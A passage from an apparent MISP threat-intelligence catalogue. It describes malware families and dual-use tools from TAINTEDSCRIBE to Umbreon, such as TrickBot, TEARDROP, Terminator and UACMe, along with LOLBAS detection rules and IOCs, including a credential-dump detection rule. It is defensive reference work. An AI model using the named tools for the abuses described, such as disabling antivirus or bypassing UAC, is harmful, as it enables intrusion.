which can be used as unique global reference for TAINTEDSCRIBE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0586 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TajMahal
TajMahal is a multifunctional spying framework that has been in use since at least 2014. TajMahal is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.[Kaspersky TajMahal April 2019]
Internal MISP references
UUID b1b7a8d9-6df3-4e89-8622-a6eea3da729b
which can be used as unique global reference for TajMahal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0467 |
source | MITRE |
type | ['malware'] |
Tar
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to extract and create archives.
Author: Brian Lucero
Paths: * C:\Windows\System32\tar.exe
Resources: * https://twitter.com/Cyber_Sorcery/status/1619819249886969856
Detection: * IOC: tar.exe extracting files from a remote host within the environment[Tar.exe - LOLBAS Project]
Internal MISP references
UUID 65e149a8-7c78-40d0-9cc5-9f420011facc
which can be used as unique global reference for Tar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5167 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Tarrask
Tarrask is malware that has been used by HAFNIUM since at least August 2021. Tarrask was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.[Tarrask scheduled task]
Internal MISP references
UUID 7bb9d181-4405-4938-bafb-b13cc98b6cd8
which can be used as unique global reference for Tarrask
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1011 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Tasklist
The Tasklist utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. [Microsoft Tasklist]
Internal MISP references
UUID abae8f19-9497-4a71-82b6-ae6edd26ad98
which can be used as unique global reference for Tasklist
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0057 |
source | MITRE |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
tcpdump
tcpdump is an open-source network packet analyzer utility run from the command line.
Internal MISP references
UUID 7a5d457c-949c-4e8f-817a-7e2d33f6c618
which can be used as unique global reference for tcpdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5267 |
source | Tidal Cyber |
tags | ['02495172-1563-48e7-8ac2-98463bd85e9d', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
TDSSKiller
TDSSKiller is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID c62b061a-b4d0-4b28-932c-3c9423443248
which can be used as unique global reference for TDSSKiller
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5044 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TDTESS
TDTESS is a 64-bit .NET binary backdoor used by CopyKittens. [ClearSky Wilted Tulip July 2017]
Internal MISP references
UUID e7116740-fe7c-45e2-b98d-0c594a7dff2f
which can be used as unique global reference for TDTESS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0164 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
te
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
Detection: * Sigma: proc_creation_win_susp_use_of_te_bin.yml[te.exe - LOLBAS Project]
Internal MISP references
UUID 8eef4e4b-e294-47bb-befa-9cd97ceced57
which can be used as unique global reference for te
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5239 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Teams
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Electron runtime binary which runs the Teams application
Author: Andrew Kisliakov
Paths: * %LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe
Resources: * https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/
Detection: * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app directory created * IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app.asar file created/modified by non-Teams installer/updater * Sigma: proc_creation_win_susp_electron_exeuction_proxy.yml[Teams.exe - LOLBAS Project]
Internal MISP references
UUID 13221a7b-6c23-48a7-97bd-21e2c689a391
which can be used as unique global reference for Teams
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5240 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
TeamViewer
TeamViewer is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 6b5f6eb4-4cdd-4383-8623-d1f7de486865
which can be used as unique global reference for TeamViewer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5010 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TEARDROP
TEARDROP is a memory-only dropper that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was likely used by APT29 since at least May 2020.[FireEye SUNBURST Backdoor December 2020][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID bae20f59-469c-451c-b4ca-70a9a04a1574
which can be used as unique global reference for TEARDROP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0560 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Teleport
Teleport is a custom tool for data exfiltration. It has been observed in use during intrusions involving Truebot, a botnet and loader malware, in 2022 and 2023.[U.S. CISA Increased Truebot Activity July 6 2023]
Internal MISP references
UUID b9a98499-c984-4199-ae64-d1381ebbaa1f
which can be used as unique global reference for Teleport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5011 |
source | Tidal Cyber |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Terminator
Terminator is an open-source software package that is designed to facilitate disabling of endpoint security/antivirus tools by abusing the zam64.sys
driver.[GitHub Terminator]
Internal MISP references
UUID 5cd0db7a-d47d-479b-89ac-9e78dfc0cd9d
which can be used as unique global reference for Terminator
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5283 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TestWindowRemoteAgent
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
Author: Onat Uzunyayla
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
Resources: None Provided
Detection: * IOC: TestWindowRemoteAgent.exe spawning unexpectedly[TestWindowRemoteAgent.exe - LOLBAS Project]
Internal MISP references
UUID 2143f749-d7b8-43c0-8041-8aeb486142c2
which can be used as unique global reference for TestWindowRemoteAgent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5241 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
TEXTMATE
TEXTMATE is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with POWERSOURCE in February 2017. [FireEye FIN7 March 2017]
Internal MISP references
UUID 49d0ae81-d51b-4534-b1e0-08371a47ef79
which can be used as unique global reference for TEXTMATE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0146 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ThiefQuest
ThiefQuest is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. ThiefQuest was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.[Reed thiefquest fake ransom] Even though ThiefQuest presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.[wardle evilquest partii][reed thiefquest ransomware analysis]
Internal MISP references
UUID 2ed5f691-68eb-49dd-b730-793dc8a7d134
which can be used as unique global reference for ThiefQuest
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0595 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
ThreatNeedle
ThreatNeedle is a backdoor that has been used by Lazarus Group since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of Lazarus Group's Manuscrypt (a.k.a. NukeSped) malware family.[Kaspersky ThreatNeedle Feb 2021]
Internal MISP references
UUID b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e
which can be used as unique global reference for ThreatNeedle
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0665 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ThunderShell
ThunderShell is a tool used to facilitate remote access via HTTP requests.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 8fe38eda-30be-4c88-ae76-ac6ebc89d66b
which can be used as unique global reference for ThunderShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5045 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TightVNC
According to its project page, TightVNC is a free and open-source remote desktop software tool that is Virtual Network Computing (VNC)-compatible. It is designed to enable remote access to other systems.[TightVNC Software Project Page]
Internal MISP references
UUID 6b0d5be9-5305-4b45-bed9-43dee66b85e8
which can be used as unique global reference for TightVNC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5015 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TinyTurla
TinyTurla is a backdoor that has been used by Turla against targets in the US, Germany, and Afghanistan since at least 2020.[Talos TinyTurla September 2021]
Internal MISP references
UUID 39f0371c-b755-4655-a97e-82a572f2fae4
which can be used as unique global reference for TinyTurla
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0668 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TINYTYPHON
TINYTYPHON is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. [Forcepoint Monsoon]
Internal MISP references
UUID 0e009cb8-848e-427a-9581-d3a4fd9f6a87
which can be used as unique global reference for TINYTYPHON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0131 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TinyZBot
TinyZBot is a bot written in C# that was developed by Cleaver. [Cylance Cleaver]
Internal MISP references
UUID 277290fe-51f3-4822-bb46-8b69fd1c8ae5
which can be used as unique global reference for TinyZBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0004 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Tomiris
Tomiris is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between Tomiris and GoldMax.[Kaspersky Tomiris Sep 2021]
Internal MISP references
UUID eff417ad-c775-4a95-9f36-a1b5a675ba82
which can be used as unique global reference for Tomiris
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0671 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Tor
Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. [Dingledine Tor The Second-Generation Onion Router]
Internal MISP references
UUID 8c70d85b-b06d-423c-8bab-ecff18f332d6
which can be used as unique global reference for Tor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0183 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Torisma
Torisma is a second stage implant designed for specialized monitoring that has been used by Lazarus Group. Torisma was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.[McAfee Lazarus Nov 2020]
Internal MISP references
UUID 4bce135b-91ba-45ae-88f9-09e01f983a74
which can be used as unique global reference for Torisma
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0678 |
source | MITRE |
type | ['malware'] |
Tracker
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft .Net Framework.
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/subTee/status/793151392185589760 * https://attack.mitre.org/wiki/Execution
Detection: * Sigma: proc_creation_win_lolbin_tracker.yml[LOLBAS Tracker]
Internal MISP references
UUID 62ebde4b-4936-49f6-842b-8c0313ea26f5
which can be used as unique global reference for Tracker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5242 |
source | Tidal Cyber |
tags | ['3c9b26cf-9bda-4feb-ab42-ef7865cc80fd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
TrailBlazer
TrailBlazer is a modular malware that has been used by APT29 since at least 2019.[CrowdStrike StellarParticle January 2022]
Internal MISP references
UUID 7a6ae9f8-5f8b-4e94-8716-d8ee82027197
which can be used as unique global reference for TrailBlazer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0682 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TrickBot
TrickBot is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to Dyre. TrickBot was developed and initially used by Wizard Spider for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.[S2 Grupo TrickBot June 2017][Fidelis TrickBot Oct 2016][IBM TrickBot Nov 2016][CrowdStrike Wizard Spider October 2020]
Internal MISP references
UUID c2bd4213-fc7b-474f-b5a0-28145b07c51d
which can be used as unique global reference for TrickBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0266 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Trojan.Karagany
Trojan.Karagany is a modular remote access tool used for recon and linked to Dragonfly. The source code for Trojan.Karagany originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. [Symantec Dragonfly][Secureworks Karagany July 2019][Dragos DYMALLOY ]
Internal MISP references
UUID b88c4891-40da-4832-ba42-6c6acd455bd1
which can be used as unique global reference for Trojan.Karagany
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0094 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Trojan.Mebromi
Trojan.Mebromi is BIOS-level malware that takes control of the victim before MBR. [Ge 2011]
Internal MISP references
UUID f8a4213d-633b-4e3d-8e59-a769e852b93b
which can be used as unique global reference for Trojan.Mebromi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0001 |
source | MITRE |
type | ['malware'] |
Truebot
Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.[U.S. CISA Increased Truebot Activity July 6 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.silence
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/truebot/
PulseDive (IOCs): https://pulsedive.com/threat/Truebot
Internal MISP references
UUID 669f8b7a-2404-47ab-843d-e63431faafec
which can be used as unique global reference for Truebot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5000 |
source | Tidal Cyber |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Truvasys
Truvasys is first-stage malware that has been used by PROMETHIUM. It is a collection of modules written in the Delphi programming language. [Microsoft Win Defender Truvasys Sep 2017] [Microsoft NEODYMIUM Dec 2016] [Microsoft SIR Vol 21]
Internal MISP references
UUID 50844dba-8999-42ba-ba29-511e3faf4bc3
which can be used as unique global reference for Truvasys
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0178 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TSCookie
TSCookie is a remote access tool (RAT) that has been used by BlackTech in campaigns against Japanese targets.[JPCert TSCookie March 2018][JPCert BlackTech Malware September 2019]. TSCookie has been referred to as PLEAD though more recent reporting indicates a separation between the two.[JPCert PLEAD Downloader June 2018][JPCert BlackTech Malware September 2019]
Internal MISP references
UUID 9872ab5a-c76e-4404-91f9-5b745722443b
which can be used as unique global reference for TSCookie
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0436 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TShark
TShark is a network protocol analyzer utility.
Internal MISP references
UUID 57f9458f-4dad-411e-9971-8e3e166f173b
which can be used as unique global reference for TShark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5268 |
source | Tidal Cyber |
tags | ['e1be4b53-7524-4e88-bf6d-358cfdf96772', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Ttdinject
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: Maxime Nadeau
Paths: * C:\Windows\System32\ttdinject.exe * C:\Windows\Syswow64\ttdinject.exe
Resources: * https://twitter.com/Oddvarmoe/status/1196333160470138880
Detection: * Sigma: create_remote_thread_win_ttdinjec.yml * Sigma: proc_creation_win_lolbin_ttdinject.yml * IOC: Parent child relationship. Ttdinject.exe parent for executed command * IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process[Ttdinject.exe - LOLBAS Project]
Internal MISP references
UUID 7bd9859e-4260-4c86-903b-1f8bcf658da1
which can be used as unique global reference for Ttdinject
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5168 |
source | Tidal Cyber |
tags | ['fc67aea7-f207-4cf5-8413-e33c76538cf6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Tttracer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows 1809 and newer to Debug Time Travel
Author: Oddvar Moe
Paths: * C:\Windows\System32\tttracer.exe * C:\Windows\SysWOW64\tttracer.exe
Resources: * https://twitter.com/oulusoyum/status/1191329746069655553 * https://twitter.com/mattifestation/status/1196390321783025666 * https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html
Detection: * Sigma: proc_creation_win_lolbin_tttracer_mod_load.yml * Sigma: image_load_tttracer_mod_load.yml * Elastic: credential_access_cmdline_dump_tool.toml * IOC: Parent child relationship. Tttracer parent for executed command[Tttracer.exe - LOLBAS Project]
Internal MISP references
UUID ab06ccb0-21c7-4d84-99ff-3349ce476910
which can be used as unique global reference for Tttracer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5169 |
source | Tidal Cyber |
tags | ['3c4e3160-4e82-49ce-b6a3-17879dd4b83c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Turian
Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.[ESET BackdoorDiplomacy Jun 2021]
Internal MISP references
UUID 571a45a7-68c9-452c-99bf-1d5b5fdd08b3
which can be used as unique global reference for Turian
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0647 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TURNEDUP
TURNEDUP is a non-public backdoor. It has been dropped by APT33's StoneDrill malware. [FireEye APT33 Sept 2017] [FireEye APT33 Webinar Sept 2017]
Internal MISP references
UUID c7f10715-cf13-4360-8511-aa3f93dd7688
which can be used as unique global reference for TURNEDUP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0199 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
TYPEFRAME
TYPEFRAME is a remote access tool that has been used by Lazarus Group. [US-CERT TYPEFRAME June 2018]
Internal MISP references
UUID 6c93d3c4-cae5-48a9-948d-bc5264230316
which can be used as unique global reference for TYPEFRAME
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0263 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
UACMe
UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. [Github UACMe]
Internal MISP references
UUID 5788edee-d1b7-4406-9122-bee596362236
which can be used as unique global reference for UACMe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0116 |
source | MITRE |
tags | ['7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
UBoatRAT
UBoatRAT is a remote access tool that was identified in May 2017.[PaloAlto UBoatRAT Nov 2017]
Internal MISP references
UUID 5214ae01-ccd5-4e97-8f9c-14eb16e75544
which can be used as unique global reference for UBoatRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0333 |
source | MITRE |
type | ['malware'] |
Umbreon
